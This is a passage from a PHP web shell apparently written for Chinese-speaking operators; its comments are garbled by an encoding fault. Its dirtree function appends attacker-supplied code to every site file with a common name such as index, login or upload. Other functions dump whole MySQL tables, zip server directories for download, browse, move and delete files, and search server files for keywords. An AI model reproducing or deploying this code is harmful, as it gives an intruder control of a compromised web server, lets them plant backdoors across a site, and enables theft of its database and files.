|
|||
|
}
|
|||
|
|
|||
|
// <20><>ȡ<EFBFBD><C8A1>ǰ<EFBFBD><C7B0><EFBFBD>ļ<EFBFBD>ϵͳ·<CDB3><C2B7>
|
|||
|
function getPath($mainpath, $relativepath) {
|
|||
|
global $dir;
|
|||
|
$mainpath_info = explode('/', $mainpath);
|
|||
|
$relativepath_info = explode('/', $relativepath);
|
|||
|
$relativepath_info_count = count($relativepath_info);
|
|||
|
for ($i=0; $i<$relativepath_info_count; $i++) {
|
|||
|
if ($relativepath_info[$i] == '.' || $relativepath_info[$i] == '') continue;
|
|||
|
if ($relativepath_info[$i] == '..') {
|
|||
|
$mainpath_info_count = count($mainpath_info);
|
|||
|
unset($mainpath_info[$mainpath_info_count-1]);
|
|||
|
continue;
|
|||
|
}
|
|||
|
$mainpath_info[count($mainpath_info)] = $relativepath_info[$i];
|
|||
|
} //end for
|
|||
|
return implode('/', $mainpath_info);
|
|||
|
}
|
|||
|
function dirtree($path,$mm)
|
|||
|
{
|
|||
|
$d =@dir("$path");
|
|||
|
while (false !== ($entry = $d->read())) {
|
|||
|
if($entry == "." || $entry == "..") continue;
|
|||
|
$file=$d->path."/" .$entry;
|
|||
|
if(@is_dir($file))
|
|||
|
{
|
|||
|
dirtree($file,$mm);
|
|||
|
}
|
|||
|
else
|
|||
|
{
|
|||
|
if(@ereg("default\.|index\.|admin\.|bbs\.|reg\.|help\.|upfile\.|upload\.|cart\.|class\.|login\.|diy\.|no\.|ok\.|del\.|sql\.|user\.|ubb\.|ftp\.|asp\.|top\.|new\.|open\.|name\.|email\.|img\.|images\.|web\.|blog\.|save\.|data\.|add\.|edit\.|main\.|form\.|game\.|about\.|manager\.|book\.|bt\.|mp3\.|vod\.|error\.|copy\.|move\.|down\.|system\.|logo\.|QQ\.|520\.|newup\.|myup\.|play\.|show\.|view\.|ip\.|err404\.|send\.|foot\.|char\.|info\.|list\.|shop\.|err\.|nc\.|ad\.|flash\.|text\.|admin_upfile\.|admin_upload\.|upfile_load\.|upfile_soft\.|upfile_photo\.|upfile_softpic\.|vip\.|505\.|tag\.|search\.|list\.|common\.|show\.|count\.|download\.|php\.",$file)) {
|
|||
|
$mm=stripcslashes( trim( $mm ) );//<2F><>ֹ<EFBFBD><D6B9>˫<EFBFBD><CBAB><EFBFBD>ű<EFBFBD><C5B1><EFBFBD><EFBFBD><EFBFBD>б<EFBFBD><D0B1>
|
|||
|
$handle = @fopen ("$file", "a");
|
|||
|
@fwrite($handle, "$mm");
|
|||
|
@fclose($handle);
|
|||
|
echo "<22>ѹ<EFBFBD><D1B9><EFBFBD><EFBFBD>ļ<EFBFBD>:$file<br>";
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
$d->close();
|
|||
|
}
|
|||
|
// <20><><EFBFBD><EFBFBD>PHP<48><50><EFBFBD>ò<EFBFBD><C3B2><EFBFBD>
|
|||
|
function getphpcfg($varname) {
|
|||
|
switch($result = get_cfg_var($varname)) {
|
|||
|
case 0:
|
|||
|
return "No";
|
|||
|
break;
|
|||
|
case 1:
|
|||
|
return "Yes";
|
|||
|
break;
|
|||
|
default:
|
|||
|
return $result;
|
|||
|
break;
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
// <20><><EFBFBD>麯<EFBFBD><E9BAAF><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
function getfun($funName) {
|
|||
|
return (false !== function_exists($funName)) ? "Yes" : "No";
|
|||
|
}
|
|||
|
|
|||
|
class zip //ZIPѹ<50><D1B9><EFBFBD><EFBFBD>
|
|||
|
{
|
|||
|
|
|||
|
var $datasec, $ctrl_dir = array();
|
|||
|
var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
|
|||
|
var $old_offset = 0; var $dirs = Array(".");
|
|||
|
function Add($files,$compact)
|
|||
|
{
|
|||
|
if(!is_array($files[0])) $files=Array($files);
|
|||
|
|
|||
|
for($i=0;$files[$i];$i++){
|
|||
|
$fn = $files[$i];
|
|||
|
if(!in_Array(dirname($fn[0]),$this->dirs))
|
|||
|
$this->add_Dir(dirname($fn[0]));
|
|||
|
if(basename($fn[0]))
|
|||
|
$ret[basename($fn[0])]=$this->add_File($fn[1],$fn[0],$compact);
|
|||
|
}
|
|||
|
return $ret;
|
|||
|
}
|
|||
|
function get_file()
|
|||
|
{
|
|||
|
$data = implode('', $this -> datasec);
|
|||
|
$ctrldir = implode('', $this -> ctrl_dir);
|
|||
|
|
|||
|
return $data . $ctrldir . $this -> eof_ctrl_dir .
|
|||
|
pack('v', sizeof($this -> ctrl_dir)).pack('v', sizeof($this -> ctrl_dir)).
|
|||
|
pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00";
|
|||
|
}
|
|||
|
function ReadCentralDir($zip,$zip_name)
|
|||
|
{
|
|||
|
$size = filesize($zip_name);
|
|||
|
if ($size < 277) $maximum_size = $size;
|
|||
|
else $maximum_size=277;
|
|||
|
@fseek($zip, $size-$maximum_size);
|
|||
|
$pos = ftell($zip); $bytes = 0x00000000;
|
|||
|
while ($pos < $size)
|
|||
|
{
|
|||
|
$byte = @fread($zip, 1); $bytes=($bytes << 8) | Ord($byte);
|
|||
|
if ($bytes == 0x504b0506){ $pos++; break; } $pos++;
|
|||
|
}
|
|||
|
$data=unpack('vdisk/vdisk_start/vdisk_entries/ventries/Vsize/Voffset/vcomment_size',fread($zip,18));
|
|||
|
if ($data['comment_size'] != 0)
|
|||
|
$centd['comment'] = fread($zip, $data['comment_size']);
|
|||
|
else $centd['comment'] = ''; $centd['entries'] = $data['entries'];
|
|||
|
$centd['disk_entries'] = $data['disk_entries'];
|
|||
|
$centd['offset'] = $data['offset'];$centd['disk_start'] = $data['disk_start'];
|
|||
|
$centd['size'] = $data['size']; $centd['disk'] = $data['disk'];
|
|||
|
return $centd;
|
|||
|
}
|
|||
|
function ReadCentralFileHeaders($zip){
|
|||
|
$binary_data = fread($zip, 46);
|
|||
|
$header = unpack('vchkid/vid/vversion/vversion_extracted/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len/vcomment_len/vdisk/vinternal/Vexternal/Voffset', $binary_data);
|
|||
|
if ($header['filename_len'] != 0)
|
|||
|
$header['filename'] = fread($zip,$header['filename_len']);
|
|||
|
else $header['filename'] = '';
|
|||
|
if ($header['extra_len'] != 0)
|
|||
|
$header['extra'] = fread($zip, $header['extra_len']);
|
|||
|
else $header['extra'] = '';
|
|||
|
if ($header['comment_len'] != 0)
|
|||
|
$header['comment'] = fread($zip, $header['comment_len']);
|
|||
|
else $header['comment'] = '';
|
|||
|
if ($header['mdate'] && $header['mtime'])
|
|||
|
{
|
|||
|
$hour = ($header['mtime'] & 0xF800) >> 11;
|
|||
|
$minute = ($header['mtime'] & 0x07E0) >> 5;
|
|||
|
$seconde = ($header['mtime'] & 0x001F)*2;
|
|||
|
$year = (($header['mdate'] & 0xFE00) >> 9) + 1980;
|
|||
|
$month = ($header['mdate'] & 0x01E0) >> 5;
|
|||
|
$day = $header['mdate'] & 0x001F;
|
|||
|
$header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year);
|
|||
|
} else {
|
|||
|
$header['mtime'] = time();
|
|||
|
}
|
|||
|
$header['stored_filename'] = $header['filename'];
|
|||
|
$header['status'] = 'ok';
|
|||
|
if (substr($header['filename'], -1) == '/')
|
|||
|
$header['external'] = 0x41FF0010;
|
|||
|
return $header;
|
|||
|
}
|
|||
|
function add_dir($name)
|
|||
|
{
|
|||
|
$name = str_replace("\\", "/", $name);
|
|||
|
$fr = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00";
|
|||
|
$fr .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) );
|
|||
|
$fr .= pack("v", 0 ).$name.pack("V", 0).pack("V", 0).pack("V", 0);
|
|||
|
$this -> datasec[] = $fr;
|
|||
|
$new_offset = strlen(implode("", $this->datasec));
|
|||
|
$cdrec = "\x50\x4b\x01\x02\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00";
|
|||
|
$cdrec .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) );
|
|||
|
$cdrec .= pack("v", 0 ).pack("v", 0 ).pack("v", 0 ).pack("v", 0 );
|
|||
|
$ext = "\xff\xff\xff\xff";
|
|||
|
$cdrec .= pack("V", 16 ).pack("V", $this -> old_offset ).$name;
|
|||
|
$this -> ctrl_dir[] = $cdrec;
|
|||
|
$this -> old_offset = $new_offset;
|
|||
|
$this -> dirs[] = $name;
|
|||
|
}
|
|||
|
function get_List($zip_name)
|
|||
|
{
|
|||
|
$zip = @fopen($zip_name, 'rb');
|
|||
|
if(!$zip) return(0);
|
|||
|
$centd = $this->ReadCentralDir($zip,$zip_name);
|
|||
|
@rewind($zip);
|
|||
|
@fseek($zip, $centd['offset']);
|
|||
|
for ($i=0; $i<$centd['entries']; $i++)
|
|||
|
{
|
|||
|
$header = $this->ReadCentralFileHeaders($zip);
|
|||
|
$header['index'] = $i;$info['filename'] = $header['filename'];
|
|||
|
$info['stored_filename'] = $header['stored_filename'];
|
|||
|
$info['size'] = $header['size'];$info['compressed_size']=$header['compressed_size'];
|
|||
|
$info['crc'] = strtoupper(dechex( $header['crc'] ));
|
|||
|
$info['mtime'] = $header['mtime']; $info['comment'] = $header['comment'];
|
|||
|
$info['folder'] = ($header['external']==0x41FF0010||$header['external']==16)?1:0;
|
|||
|
$info['index'] = $header['index'];$info['status'] = $header['status'];
|
|||
|
$ret[]=$info; unset($header);
|
|||
|
}
|
|||
|
return $ret;
|
|||
|
}
|
|||
|
function add_File($data, $name, $compact = 1)
|
|||
|
{
|
|||
|
$name = str_replace('\\', '/', $name);
|
|||
|
$dtime = dechex($this->DosTime());
|
|||
|
$hexdtime = '\x' . $dtime[6] . $dtime[7].'\x'.$dtime[4] . $dtime[5]
|
|||
|
. '\x' . $dtime[2] . $dtime[3].'\x'.$dtime[0].$dtime[1];
|
|||
|
eval('$hexdtime = "' . $hexdtime . '";');
|
|||
|
if($compact)
|
|||
|
$fr = "\x50\x4b\x03\x04\x14\x00\x00\x00\x08\x00".$hexdtime;
|
|||
|
else $fr = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00".$hexdtime;
|
|||
|
$unc_len = strlen($data); $crc = crc32($data);
|
|||
|
if($compact){
|
|||
|
$zdata = gzcompress($data); $c_len = strlen($zdata);
|
|||
|
$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
|
|||
|
}else{
|
|||
|
$zdata = $data;
|
|||
|
}
|
|||
|
$c_len=strlen($zdata);
|
|||
|
$fr .= pack('V', $crc).pack('V', $c_len).pack('V', $unc_len);
|
|||
|
$fr .= pack('v', strlen($name)).pack('v', 0).$name.$zdata;
|
|||
|
$fr .= pack('V', $crc).pack('V', $c_len).pack('V', $unc_len);
|
|||
|
$this -> datasec[] = $fr;
|
|||
|
$new_offset = strlen(implode('', $this->datasec));
|
|||
|
if($compact)
|
|||
|
$cdrec = "\x50\x4b\x01\x02\x00\x00\x14\x00\x00\x00\x08\x00";
|
|||
|
else $cdrec = "\x50\x4b\x01\x02\x14\x00\x0a\x00\x00\x00\x00\x00";
|
|||
|
$cdrec .= $hexdtime.pack('V', $crc).pack('V', $c_len).pack('V', $unc_len);
|
|||
|
$cdrec .= pack('v', strlen($name) ).pack('v', 0 ).pack('v', 0 );
|
|||
|
$cdrec .= pack('v', 0 ).pack('v', 0 ).pack('V', 32 );
|
|||
|
$cdrec .= pack('V', $this -> old_offset );
|
|||
|
$this -> old_offset = $new_offset;
|
|||
|
$cdrec .= $name;
|
|||
|
$this -> ctrl_dir[] = $cdrec;
|
|||
|
return true;
|
|||
|
}
|
|||
|
|
|||
|
function DosTime() {
|
|||
|
$timearray = getdate();
|
|||
|
if ($timearray['year'] < 1980) {
|
|||
|
$timearray['year'] = 1980; $timearray['mon'] = 1;
|
|||
|
$timearray['mday'] = 1; $timearray['hours'] = 0;
|
|||
|
$timearray['minutes'] = 0; $timearray['seconds'] = 0;
|
|||
|
}
|
|||
|
return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) |
|
|||
|
($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
|
|||
|
}
|
|||
|
function Extract ( $zn, $to, $index = Array(-1) )
|
|||
|
{
|
|||
|
$ok = 0; $zip = @fopen($zn,'rb');
|
|||
|
if(!$zip) return(-1);
|
|||
|
$cdir = $this->ReadCentralDir($zip,$zn);
|
|||
|
$pos_entry = $cdir['offset'];
|
|||
|
|
|||
|
if(!is_array($index)){ $index = array($index); }
|
|||
|
for($i=0; $index[$i];$i++){
|
|||
|
if(intval($index[$i])!=$index[$i]||$index[$i]>$cdir['entries'])
|
|||
|
return(-1);
|
|||
|
}
|
|||
|
|
|||
|
for ($i=0; $i<$cdir['entries']; $i++)
|
|||
|
{
|
|||
|
@fseek($zip, $pos_entry);
|
|||
|
$header = $this->ReadCentralFileHeaders($zip);
|
|||
|
$header['index'] = $i; $pos_entry = ftell($zip);
|
|||
|
@rewind($zip); fseek($zip, $header['offset']);
|
|||
|
if(in_array("-1",$index)||in_array($i,$index))
|
|||
|
$stat[$header['filename']]=$this->ExtractFile($header, $to, $zip);
|
|||
|
|
|||
|
}
|
|||
|
fclose($zip);
|
|||
|
return $stat;
|
|||
|
}
|
|||
|
function ExtractFile($header,$to,$zip)
|
|||
|
{
|
|||
|
$header = $this->readfileheader($zip);
|
|||
|
|
|||
|
if(substr($to,-1)!="/") $to.="/";
|
|||
|
if(!@is_dir($to)) @mkdir($to,0777);
|
|||
|
|
|||
|
$pth = explode("/",dirname($header['filename']));
|
|||
|
for($i=0;isset($pth[$i]);$i++){
|
|||
|
if(!$pth[$i]) continue;$pthss.=$pth[$i]."/";
|
|||
|
if(!is_dir($to.$pthss)) @mkdir($to.$pthss,0777);
|
|||
|
}
|
|||
|
if (!($header['external']==0x41FF0010)&&!($header['external']==16))
|
|||
|
{
|
|||
|
if ($header['compression']==0)
|
|||
|
{
|
|||
|
$fp = @fopen($to.$header['filename'], 'wb');
|
|||
|
if(!$fp) return(-1);
|
|||
|
$size = $header['compressed_size'];
|
|||
|
|
|||
|
while ($size != 0)
|
|||
|
{
|
|||
|
$read_size = ($size < 2048 ? $size : 2048);
|
|||
|
$buffer = fread($zip, $read_size);
|
|||
|
$binary_data = pack('a'.$read_size, $buffer);
|
|||
|
@fwrite($fp, $binary_data, $read_size);
|
|||
|
$size -= $read_size;
|
|||
|
}
|
|||
|
fclose($fp);
|
|||
|
touch($to.$header['filename'], $header['mtime']);
|
|||
|
|
|||
|
}else{
|
|||
|
$fp = @fopen($to.$header['filename'].'.gz','wb');
|
|||
|
if(!$fp) return(-1);
|
|||
|
$binary_data = pack('va1a1Va1a1', 0x8b1f, Chr($header['compression']),
|
|||
|
Chr(0x00), time(), Chr(0x00), Chr(3));
|
|||
|
|
|||
|
fwrite($fp, $binary_data, 10);
|
|||
|
$size = $header['compressed_size'];
|
|||
|
|
|||
|
while ($size != 0)
|
|||
|
{
|
|||
|
$read_size = ($size < 1024 ? $size : 1024);
|
|||
|
$buffer = fread($zip, $read_size);
|
|||
|
$binary_data = pack('a'.$read_size, $buffer);
|
|||
|
@fwrite($fp, $binary_data, $read_size);
|
|||
|
$size -= $read_size;
|
|||
|
}
|
|||
|
|
|||
|
$binary_data = pack('VV', $header['crc'], $header['size']);
|
|||
|
fwrite($fp, $binary_data,8); fclose($fp);
|
|||
|
|
|||
|
$gzp = @gzopen($to.$header['filename'].'.gz','rb') or die("Cette archive est compress<73>e");
|
|||
|
if(!$gzp) return(-2);
|
|||
|
$fp = @fopen($to.$header['filename'],'wb');
|
|||
|
if(!$fp) return(-1);
|
|||
|
$size = $header['size'];
|
|||
|
|
|||
|
while ($size != 0)
|
|||
|
{
|
|||
|
$read_size = ($size < 2048 ? $size : 2048);
|
|||
|
$buffer = gzread($gzp, $read_size);
|
|||
|
$binary_data = pack('a'.$read_size, $buffer);
|
|||
|
@fwrite($fp, $binary_data, $read_size);
|
|||
|
$size -= $read_size;
|
|||
|
}
|
|||
|
fclose($fp); gzclose($gzp);
|
|||
|
|
|||
|
touch($to.$header['filename'], $header['mtime']);
|
|||
|
@unlink($to.$header['filename'].'.gz');
|
|||
|
|
|||
|
}}
|
|||
|
return true;
|
|||
|
}
|
|||
|
function ReadFileHeader($zip)
|
|||
|
{
|
|||
|
$binary_data = fread($zip, 30);
|
|||
|
$data = unpack('vchk/vid/vversion/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len', $binary_data);
|
|||
|
|
|||
|
$header['filename'] = fread($zip, $data['filename_len']);
|
|||
|
if ($data['extra_len'] != 0) {
|
|||
|
$header['extra'] = fread($zip, $data['extra_len']);
|
|||
|
} else { $header['extra'] = ''; }
|
|||
|
|
|||
|
$header['compression'] = $data['compression'];$header['size'] = $data['size'];
|
|||
|
$header['compressed_size'] = $data['compressed_size'];
|
|||
|
$header['crc'] = $data['crc']; $header['flag'] = $data['flag'];
|
|||
|
$header['mdate'] = $data['mdate'];$header['mtime'] = $data['mtime'];
|
|||
|
|
|||
|
if ($header['mdate'] && $header['mtime']){
|
|||
|
$hour=($header['mtime']&0xF800)>>11;$minute=($header['mtime']&0x07E0)>>5;
|
|||
|
$seconde=($header['mtime']&0x001F)*2;$year=(($header['mdate']&0xFE00)>>9)+1980;
|
|||
|
$month=($header['mdate']&0x01E0)>>5;$day=$header['mdate']&0x001F;
|
|||
|
$header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year);
|
|||
|
}else{$header['mtime'] = time();}
|
|||
|
|
|||
|
$header['stored_filename'] = $header['filename'];
|
|||
|
$header['status'] = "ok";
|
|||
|
return $header;
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
function addziparray($dir2) //<2F><><EFBFBD><EFBFBD>ZIP<49>ļ<EFBFBD>
|
|||
|
{
|
|||
|
global $dir,$zipfilearray;
|
|||
|
@$dirs=opendir($dir."/".$dir2);
|
|||
|
while (@$file=readdir($dirs)) {
|
|||
|
if(!is_dir("$dir/$dir2/$file")) {
|
|||
|
$zipfilearray[]="$dir2/$file";
|
|||
|
}
|
|||
|
elseif($file!="."&&$file!="..") {
|
|||
|
addziparray("$dir2/$file");
|
|||
|
}
|
|||
|
}
|
|||
|
@closedir($dirs);
|
|||
|
}
|
|||
|
function hlinK($str=""){
|
|||
|
$myvars=array('workingdiR','urL','imagE','namE','filE','downloaD','seC','cP','mV','rN','deL');
|
|||
|
$ret=$_SERVER['PHP_SELF']."?";
|
|||
|
$new=explode("&",$str);
|
|||
|
foreach ($_GET as $key => $v){
|
|||
|
$add=1;
|
|||
|
foreach($new as $m){
|
|||
|
$el = explode("=", $m);
|
|||
|
if ($el[0]==$key)$add=0;
|
|||
|
}
|
|||
|
if($add)if(!in_array($key,$myvars))$ret.=$key."=".$v."&";
|
|||
|
}
|
|||
|
$ret.=$str;
|
|||
|
return $ret;
|
|||
|
}
|
|||
|
|
|||
|
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݿ<EFBFBD>
|
|||
|
function sqldumptable($table, $fp=0) {
|
|||
|
$tabledump = "DROP TABLE IF EXISTS $table;\n";
|
|||
|
$tabledump .= "CREATE TABLE $table (\n";
|
|||
|
|
|||
|
$firstfield=1;
|
|||
|
|
|||
|
$fields = mysql_query("SHOW FIELDS FROM $table");
|
|||
|
while ($field = mysql_fetch_array($fields)) {
|
|||
|
if (!$firstfield) {
|
|||
|
$tabledump .= ",\n";
|
|||
|
} else {
|
|||
|
$firstfield=0;
|
|||
|
}
|
|||
|
$tabledump .= " $field[Field] $field[Type]";
|
|||
|
if (!empty($field["Default"])) {
|
|||
|
$tabledump .= " DEFAULT '$field[Default]'";
|
|||
|
}
|
|||
|
if ($field['Null'] != "YES") {
|
|||
|
$tabledump .= " NOT NULL";
|
|||
|
}
|
|||
|
if ($field['Extra'] != "") {
|
|||
|
$tabledump .= " $field[Extra]";
|
|||
|
}
|
|||
|
}
|
|||
|
mysql_free_result($fields);
|
|||
|
|
|||
|
$keys = mysql_query("SHOW KEYS FROM $table");
|
|||
|
while ($key = mysql_fetch_array($keys)) {
|
|||
|
$kname=$key['Key_name'];
|
|||
|
if ($kname != "PRIMARY" and $key['Non_unique'] == 0) {
|
|||
|
$kname="UNIQUE|$kname";
|
|||
|
}
|
|||
|
if(!is_array($index[$kname])) {
|
|||
|
$index[$kname] = array();
|
|||
|
}
|
|||
|
$index[$kname][] = $key['Column_name'];
|
|||
|
}
|
|||
|
mysql_free_result($keys);
|
|||
|
|
|||
|
while(list($kname, $columns) = @each($index)) {
|
|||
|
$tabledump .= ",\n";
|
|||
|
$colnames=implode($columns,",");
|
|||
|
|
|||
|
if ($kname == "PRIMARY") {
|
|||
|
$tabledump .= " PRIMARY KEY ($colnames)";
|
|||
|
} else {
|
|||
|
if (substr($kname,0,6) == "UNIQUE") {
|
|||
|
$kname=substr($kname,7);
|
|||
|
}
|
|||
|
$tabledump .= " KEY $kname ($colnames)";
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
$tabledump .= "\n);\n\n";
|
|||
|
if ($fp) {
|
|||
|
fwrite($fp,$tabledump);
|
|||
|
} else {
|
|||
|
echo $tabledump;
|
|||
|
}
|
|||
|
|
|||
|
$rows = mysql_query("SELECT * FROM $table");
|
|||
|
$numfields = mysql_num_fields($rows);
|
|||
|
while ($row = mysql_fetch_array($rows)) {
|
|||
|
$tabledump = "INSERT INTO $table VALUES(";
|
|||
|
|
|||
|
$fieldcounter=-1;
|
|||
|
$firstfield=1;
|
|||
|
while (++$fieldcounter<$numfields) {
|
|||
|
if (!$firstfield) {
|
|||
|
$tabledump.=", ";
|
|||
|
} else {
|
|||
|
$firstfield=0;
|
|||
|
}
|
|||
|
|
|||
|
if (!isset($row[$fieldcounter])) {
|
|||
|
$tabledump .= "NULL";
|
|||
|
} else {
|
|||
|
$tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'";
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
$tabledump .= ");\n";
|
|||
|
|
|||
|
if ($fp) {
|
|||
|
fwrite($fp,$tabledump);
|
|||
|
} else {
|
|||
|
echo $tabledump;
|
|||
|
}
|
|||
|
}
|
|||
|
mysql_free_result($rows);
|
|||
|
}
|
|||
|
|
|||
|
class FORMS {
|
|||
|
function tableheader() {
|
|||
|
echo "<table width=\"775\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" bgcolor=\"#ffffff\">\n";
|
|||
|
}
|
|||
|
|
|||
|
function headerform($arg=array()) {
|
|||
|
global $dir;
|
|||
|
if ($arg[enctype]){
|
|||
|
$enctype="enctype=\"$arg[enctype]\"";
|
|||
|
} else {
|
|||
|
$enctype="";
|
|||
|
}
|
|||
|
if (!isset($arg[method])) {
|
|||
|
$arg[method] = "POST";
|
|||
|
}
|
|||
|
if (!isset($arg[action])) {
|
|||
|
$arg[action] = '';
|
|||
|
}
|
|||
|
echo " <form action=\"".$arg[action]."\" method=\"".$arg[method]."\" $enctype>\n";
|
|||
|
echo " <tr>\n";
|
|||
|
echo " <td>".$arg[content]."</td>\n";
|
|||
|
echo " </tr>\n";
|
|||
|
echo " </form>\n";
|
|||
|
}
|
|||
|
|
|||
|
function tdheader($title) {
|
|||
|
global $dir;
|
|||
|
echo " <tr class=\"firstalt\">\n";
|
|||
|
echo " <td align=\"center\"><b>".$title." [<a href=\"?dir=".urlencode($dir)."\"><3E><><EFBFBD><EFBFBD></a>]</b></td>\n";
|
|||
|
echo " </tr>\n";
|
|||
|
}
|
|||
|
|
|||
|
function tdbody($content,$align='center',$bgcolor='2',$height='',$extra='',$colspan='') {
|
|||
|
if ($bgcolor=='2') {
|
|||
|
$css="secondalt";
|
|||
|
} elseif ($bgcolor=='1') {
|
|||
|
$css="firstalt";
|
|||
|
} else {
|
|||
|
$css=$bgcolor;
|
|||
|
}
|
|||
|
$height = empty($height) ? "" : " height=".$height;
|
|||
|
$colspan = empty($colspan) ? "" : " colspan=".$colspan;
|
|||
|
echo " <tr class=\"".$css."\">\n";
|
|||
|
echo " <td align=\"".$align."\"".$height." ".$colspan." ".$extra.">".$content."</td>\n";
|
|||
|
echo " </tr>\n";
|
|||
|
}
|
|||
|
|
|||
|
function tablefooter() {
|
|||
|
echo "</table>\n";
|
|||
|
}
|
|||
|
|
|||
|
function formheader($action='',$title,$target='') {
|
|||
|
global $dir;
|
|||
|
$target = empty($target) ? "" : " target=\"".$target."\"";
|
|||
|
echo " <form action=\"$action\" method=\"POST\"".$target.">\n";
|
|||
|
echo " <tr class=\"firstalt\">\n";
|
|||
|
echo " <td align=\"center\"><b>".$title." [<a href=\"?dir=".urlencode($dir)."\"><3E><><EFBFBD><EFBFBD></a>]</b></td>\n";
|
|||
|
echo " </tr>\n";
|
|||
|
}
|
|||
|
|
|||
|
function makehidden($name,$value=''){
|
|||
|
echo "<input type=\"hidden\" name=\"$name\" value=\"$value\">\n";
|
|||
|
}
|
|||
|
|
|||
|
function makeinput($name,$value='',$extra='',$type='text',$size='30',$css='input'){
|
|||
|
$css = ($css == 'input') ? " class=\"input\"" : "";
|
|||
|
$input = "<input name=\"$name\" value=\"$value\" type=\"$type\" ".$css." size=\"$size\" $extra>\n";
|
|||
|
return $input;
|
|||
|
}
|
|||
|
|
|||
|
function maketextarea($name,$content='',$cols='100',$rows='20',$extra=''){
|
|||
|
$textarea = "<textarea name=\"".$name."\" cols=\"".$cols."\" rows=\"".$rows."\" ".$extra.">".$content."</textarea>\n";
|
|||
|
return $textarea;
|
|||
|
}
|
|||
|
|
|||
|
function formfooter($over='',$height=''){
|
|||
|
$height = empty($height) ? "" : " height=\"".$height."\"";
|
|||
|
echo " <tr class=\"secondalt\">\n";
|
|||
|
echo " <td align=\"center\"".$height."><input class=\"input\" type=\"submit\" value=\"ȷ<><C8B7>\"></td>\n";
|
|||
|
echo " </tr>\n";
|
|||
|
echo " </form>\n";
|
|||
|
echo $end = empty($over) ? "" : "</table>\n";
|
|||
|
}
|
|||
|
|
|||
|
function makeselect($arg = array()){
|
|||
|
if ($arg[multiple]==1) {
|
|||
|
$multiple = " multiple";
|
|||
|
if ($arg[size]>0) {
|
|||
|
$size = "size=$arg[size]";
|
|||
|
}
|
|||
|
}
|
|||
|
if ($arg[css]==0) {
|
|||
|
$css = "class=\"input\"";
|
|||
|
}
|
|||
|
$select = "<select $css name=\"$arg[name]\"$multiple $size>\n";
|
|||
|
if (is_array($arg[option])) {
|
|||
|
foreach ($arg[option] AS $key=>$value) {
|
|||
|
if (!is_array($arg[selected])) {
|
|||
|
if ($arg[selected]==$key) {
|
|||
|
$select .= "<option value=\"$key\" selected>$value</option>\n";
|
|||
|
} else {
|
|||
|
$select .= "<option value=\"$key\">$value</option>\n";
|
|||
|
}
|
|||
|
|
|||
|
} elseif (is_array($arg[selected])) {
|
|||
|
if ($arg[selected][$key]==1) {
|
|||
|
$select .= "<option value=\"$key\" selected>$value</option>\n";
|
|||
|
} else {
|
|||
|
$select .= "<option value=\"$key\">$value</option>\n";
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
$select .= "</select>\n";
|
|||
|
return $select;
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
function find($path) //<2F><><EFBFBD>ҹؼ<D2B9><D8BC><EFBFBD>
|
|||
|
{
|
|||
|
global $oldkey,$type,$type2,$endline,$beline;
|
|||
|
if(is_dir("$path")){
|
|||
|
$tempdir=opendir("$path");
|
|||
|
while($f=readdir($tempdir)){ if($f=="."||$f=="..")continue; find("$path/$f");}
|
|||
|
closedir($tempdir);
|
|||
|
}else{
|
|||
|
if(filesize("$path")){
|
|||
|
$fp=fopen("$path","r");
|
|||
|
$msg=fread($fp, filesize("$path"));
|
|||
|
fclose($fp);
|
|||
|
if(strpos($msg, $oldkey) !== false) {
|
|||
|
$dir = dirname($path);
|
|||
|
$file = basename($path);
|
|||
|
if($type=="list"){
|
|||
|
$mymsg = explode("\n",$msg);
|
|||
|
$long = count($mymsg);
|
|||
|
$tmp = explode($oldkey,$msg);
|
|||
|
$tmp = explode("\n",$tmp[0]);
|
|||
|
$first = count($tmp);
|
|||
|
$end = "[".$first."/".$long."]";
|
|||
|
}
|
|||
|
if($type2=="getpath"){
|
|||
|
$get = explode($oldkey,$msg);
|
|||
|
$get = strlen($get[0]);
|
|||
|
if(isset($beline)){
|
|||
|
$get = $get-$beline;
|
|||
|
}
|
|||
|
$getpath = htmlspecialchars(substr($msg, $get, $endline));
|
|||
|
$getpath = "title = \"".$getpath."\"";
|
|||
|
}
|
|||
|
echo "<span class=\"redfont\" $getpath><3E>ҵ<EFBFBD>:$dir/$file</span> |<a href=\"?action=editfile&dir=$dir&editfile=$file\" target=\"_blank\">view+edit</a> | $end <br>";
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
}?>
|